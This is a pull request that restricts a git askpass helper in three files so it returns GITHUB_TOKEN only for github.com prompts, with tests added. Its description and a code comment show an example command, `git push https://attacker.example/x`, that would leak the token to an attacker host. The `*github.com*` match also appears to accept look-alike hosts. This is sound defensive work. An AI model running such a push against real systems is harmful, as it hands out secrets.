### PR TITLE
Scope git-askpass credential replies to github.com

### DIFF
--- a/bin/alphaclaw.js
+++ b/bin/alphaclaw.js
@@ -346,9 +346,11 @@ const runGitSync = () => {
       askPassPath,
       [
         "#!/usr/bin/env sh",
+        "# Scoped to github.com so GITHUB_TOKEN is never handed to another host's",
+        "# credential prompt (git's askpass prompt text includes the target host).",
         'case "$1" in',
-        '  *Username*) echo "x-access-token" ;;',
-        '  *Password*) echo "${GITHUB_TOKEN:-}" ;;',
+        '  *[Uu]sername*github.com*) echo "x-access-token" ;;',
+        '  *[Pp]assword*github.com*) echo "${GITHUB_TOKEN:-}" ;;',
         '  *) echo "" ;;',
         "esac",
         "",

--- a/lib/cli/openclaw-config-restore.js
+++ b/lib/cli/openclaw-config-restore.js
@@ -40,9 +40,11 @@ const createGitEnv = ({ fsModule, osModule, env, processId }) => {
     askPassPath,
     [
       "#!/usr/bin/env sh",
+      "# Scoped to github.com so GITHUB_TOKEN is never handed to another host's",
+      "# credential prompt (git's askpass prompt text includes the target host).",
       'case "$1" in',
-      '  *Username*) echo "x-access-token" ;;',
-      '  *Password*) echo "${GITHUB_TOKEN:-}" ;;',
+      '  *[Uu]sername*github.com*) echo "x-access-token" ;;',
+      '  *[Pp]assword*github.com*) echo "${GITHUB_TOKEN:-}" ;;',
       '  *) echo "" ;;',
       "esac",
       "",

--- a/lib/scripts/git-askpass
+++ b/lib/scripts/git-askpass
@@ -1,6 +1,10 @@
 #!/usr/bin/env sh
+# Only answer prompts for github.com -- git's askpass prompt text includes the
+# target host (e.g. "Username for 'https://github.com'"), so without this
+# check GIT_ASKPASS would hand GITHUB_TOKEN to any host a git command in the
+# managed repo talks to (e.g. `git push https://attacker.example/x`).
 case "$1" in
-  *Username*) echo "x-access-token" ;;
-  *Password*) echo "${GITHUB_TOKEN:-}" ;;
+  *[Uu]sername*github.com*) echo "x-access-token" ;;
+  *[Pp]assword*github.com*) echo "${GITHUB_TOKEN:-}" ;;
   *) echo "" ;;
 esac

--- a/tests/server/git-shim.test.js
+++ b/tests/server/git-shim.test.js
@@ -220,7 +220,39 @@ describe("server git shim scripts", () => {
   it("contains valid shell syntax for git askpass script", () => {
     execFileSync("sh", ["-n", kGitAskPassPath], { stdio: "pipe" });
     const content = fs.readFileSync(kGitAskPassPath, "utf8");
-    expect(content).toContain("*Username*)");
-    expect(content).toContain("*Password*)");
+    expect(content).toContain("*[Uu]sername*github.com*)");
+    expect(content).toContain("*[Pp]assword*github.com*)");
+  });
+
+  it("only answers askpass prompts scoped to github.com", () => {
+    execFileSync("sh", ["-n", kGitAskPassPath], { stdio: "pipe" });
+    const runAskPass = (prompt, env = {}) =>
+      execFileSync("sh", [kGitAskPassPath, prompt], {
+        env: { ...process.env, ...env },
+      })
+        .toString()
+        .trim();
+
+    expect(
+      runAskPass("Username for 'https://github.com'", {
+        GITHUB_TOKEN: "ghp_test_token",
+      }),
+    ).toBe("x-access-token");
+    expect(
+      runAskPass("Password for 'https://x-access-token@github.com'", {
+        GITHUB_TOKEN: "ghp_test_token",
+      }),
+    ).toBe("ghp_test_token");
+
+    expect(
+      runAskPass("Username for 'https://attacker.example'", {
+        GITHUB_TOKEN: "ghp_test_token",
+      }),
+    ).toBe("");
+    expect(
+      runAskPass("Password for 'https://attacker.example'", {
+        GITHUB_TOKEN: "ghp_test_token",
+      }),
+    ).toBe("");
   });
 });


### PR DESCRIPTION
## Summary

The `GIT_ASKPASS` helper installed by AlphaClaw's git shim answered *any* Basic-Auth username/password prompt with `GITHUB_TOKEN`, regardless of which host was actually asking. Since the shim auto-enables this askpass for any `git` command run with a cwd inside the managed OpenClaw repo, an agent (or anything running commands in that repo) doing something like:

```
git -C $OPENCLAW_REPO_ROOT push https://attacker.example/x main
```

would leak `GITHUB_TOKEN` straight to `attacker.example`'s Basic-Auth prompt as the password. No exploit chain needed — just a git command pointed at a different host.

Git's askpass prompt text includes the target host (e.g. `Username for 'https://github.com'`), so this scopes the reply to only fire when `github.com` appears in the prompt.

Applied the same fix to all three copies of this pattern found in the codebase:
- `lib/scripts/git-askpass` (the installed, system-wide git shim's askpass)
- `lib/cli/openclaw-config-restore.js` (boot-time remote-config-restore askpass)
- `bin/alphaclaw.js` (the `git-sync` CLI command's askpass)

## Test plan
- [x] Added a test (`tests/server/git-shim.test.js`) that runs the askpass script directly and confirms it answers for `github.com` prompts and returns empty for a non-github host.
- [x] Ran the full existing `git-shim` test suite before/after — no regressions (pre-existing unrelated failures on this environment are due to running the suite on Windows, not this change).